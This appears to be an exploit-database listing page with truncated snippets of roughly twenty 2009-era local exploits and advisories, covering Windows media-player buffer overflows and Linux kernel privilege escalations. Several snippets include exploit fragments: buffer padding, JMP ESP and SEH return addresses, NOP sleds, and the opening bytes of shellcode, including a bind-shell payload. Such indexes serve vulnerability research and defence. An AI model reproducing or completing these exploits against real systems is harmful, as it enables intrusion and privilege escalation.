Easy RM to MP3 2.7.3.700 - Local Overflow

!/usr/bin/ruby breakit = "\x41" 26109 jump = "\x3a\xf2\xaa\x01" padit = "\x90" 25 01AAF23A FFE4 JMP ESP MSRMCcodec02.dll finishhim = "\xdd\xc5\xd9\x74\x24\xf4\x58\xbf\x27\x98\xb6\xfc\x31\xc9" + "\xb1\x32\x31\x78\x17\x83\xe8\xfc\x03\x5f\x8b\x54\x09\x63" +...

Linux 2.6.x fs/pipe.c local root exploit

No description provided by source. For those who were not yet aware, there is at least 3 public exploits since 11/05/2009 for CVE-2009-3547 targeting all linux kernels from 2.6.0 to 2.6.31 included. Since spender and fotis have already release their own, there is not need for us to keep this on o...

Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation (2)

/ source: https://www.securityfocus.com/bid/36901/info Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result i...

CVE-2009-3640

CVE-2009-3640 affects the Linux kernel KVM component (arch/x86/kvm/x86.c). The update_cr8_intercept function does not properly handle missing APIC, causing a local denial of service via a NULL pointer dereference and, potentially, privilege escalation through kvm_vcpu_ioctl. Affected: kernels bef...

Alleycode HTML Editor 2.2.1 - Local Buffer Overflow

!/usr/bin/env python Alleycode HTML Editor 2.21 Local .HTML Overflow Exploit SEH Coded By: DrIDE Found By: Rafael de Sousa Tested On: XPSP0 SP3 doesn't have any usable P/P/R Download: www.alleycode.com calc.exe - 303 bytes Encoder - alpha/upper EXITFUNC - SEH sc =...

PT-2009-4922 · Microsoft · Windows Server 2003 +5

Name of the Vulnerable Software and Affected Versions: Microsoft Windows versions prior to the fixed version Description: The issue is caused by an integer underflow in the kernel, allowing local users to gain privileges via a crafted application. This occurs due to the incorrect truncation of a...

Free WMA MP3 Converter 1.1 Buffer Overflow

!/usr/bin/perl Free WMA MP3 Converter v1.1 .wav Local Buffer Overflow seh Vendor: http://www.eusing.com/ Discovered by: KriPpLer http://www.x-sploited.com/ Tested on: Windows XP Pro SP2. Description: FREE WMA MP3 converter v1.1 Local Buffer Overflow Exploit SEH This application is vulnerable to a...

FreeBSD-SA-09:14.devfs

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================= FreeBSD-SA-09:14.devfs Security Advisory The FreeBSD Project Topic: Devfs / VFS NULL pointer race condition Category: core Module: kern Announced: 2009-10-02 Credits:...

Winplot (.wp2 File) Local Buffer Overflow Exploit

Exploit for unknown platform in category local exploits ================================================= Winplot .wp2 File Local Buffer Overflow Exploit ================================================= Author: Rick Software: http://math.exeter.edu/rparris/peanut/wp32z.exe Version: Compiled in 1...

SAP Player 0.9 (.pla) Universal Local Buffer Overflow Exploit (SEH)

Exploit for unknown platform in category local exploits =================================================================== SAP Player 0.9 .pla Universal Local Buffer Overflow Exploit SEH =================================================================== !/usr/bin/python SAP player 0.9 .pla...

MP3 Studio 1.0 (.m3u File) Local Buffer Overflow Exploit

Exploit for unknown platform in category local exploits ======================================================== MP3 Studio 1.0 .m3u File Local Buffer Overflow Exploit ======================================================== / mplode.c vs MP3 Studio v1.0 Tested on: Windows 2000 SP4 Author: Domini...

Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow

!/usr/bin/perl print qq Iranian Pentesters Home Www.Pentesters.Ir PLATEN - H.jafari - Invisible Browsing 5.0.52 .ibkey Local BoF Exploit bug found & exploited by: PLATEN E-mail && blog: hjafari.blogspot.com platen.secureatgmaildotcom Greetings: Cru3l.b0y, b3hz4d, Cdef3nder and all members in...

jetAudio 7.1.9.4030 plus - vx(asxwaxwvx) Universal Local Buffer Overflow (SEH)

jetAudio 7.1.9.4030 plus - vxasxwaxwvx Universal Local Buffer Overflow SEH !/usr/bin/perl Found By :: HACK4LOVE [email protected] jetAudio v 7.1.9.4030 plus vxasx/wax/wvxUniversal Local BOF SEH use--open file--hac4love.asx after that just move the mouse to information box in the jetAudio...

GemStone/S 6.3.1 (stoned) Local Buffer Overflow Exploit

Exploit for linux platform in category local exploits ======================================================= GemStone/S 6.3.1 stoned Local Buffer Overflow Exploit ======================================================= / wonderfulcaricatureofexploitability.c AKA GemStone/S 6.3.1 "stoned" Local...

OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)

!/usr/bin/perl by hack4love [email protected] OtsTurntables Free 1.00.027 .m3u/ ofl File Local Universal BOF Exploit SEH --- info:: 1.00.027 was released 3 March 2008 http://www.brothersoft.com/otsturntables-free-download-86957.html Original exploit::http://www.milw0rm.com/exploits/8371 my...

Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit

No description provided by source. / hoagieudpsendmsg.c LOCAL LINUX KERNEL ROOT EXPLOIT 2.6.19 - CVE-2009-2698 udpsendmsg bug exploit via output callback function used in dstentry / rtable Bug reported by Tavis Ormandy and Julien Tinnes of the Google Security Team Tested with Debian Etch r0 $ cat...

dTunes 2.72 (Filename Processing) Local Format String PoC

No description provided by source. !/usr/bin/perl dTunes 2.72 local format string PoC filename processing TheLeader, GSOG2009 st0p hotmail sp4m com ShoutZ to the wonderful ppl over at forums.hacking.org.il = Copy the file over to your device on /var/mobile/Library/Downloads/ and attempt playing...

dTunes 2.72 - Filename Processing Local Format String (PoC)

!/usr/bin/perl dTunes 2.72 local format string PoC filename processing TheLeader, GSOG2009 st0p hotmail sp4m com ShoutZ to the wonderful ppl over at forums.hacking.org.il = Copy the file over to your device on /var/mobile/Library/Downloads/ and attempt playing with dTunes. This can also be done...

Swift Ultralite 1.032 - .m3u Local Buffer Overflow (PoC)

Swift Ultralite 1.032 - .m3u Local Buffer Overflow PoC !/usr/bin/perl Found By :: HACK4LOVE [email protected] Swift Ultralite 1.032 .M3U Local Buffer Overflow PoC EAX 00000000 ECX FFFFFFFF EDX 004976F0 SwiftUlt.004976F0 EBX 00000270 ESP 0013F1CC EBP 00000000 ESI 0013F31B...

PIPL 2.5.0 Buffer Overflow

!/usr/bin/python PIPL print "+ Pipl 2.5.0 local exploit" bof="\x41" 4108 nsh="\xEB\x06\x90\x90" seh="\x17\x07\x01\x10" xaudio.dll ppr nops="\x90" 20 win32bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum http://metasploit.com / sc =...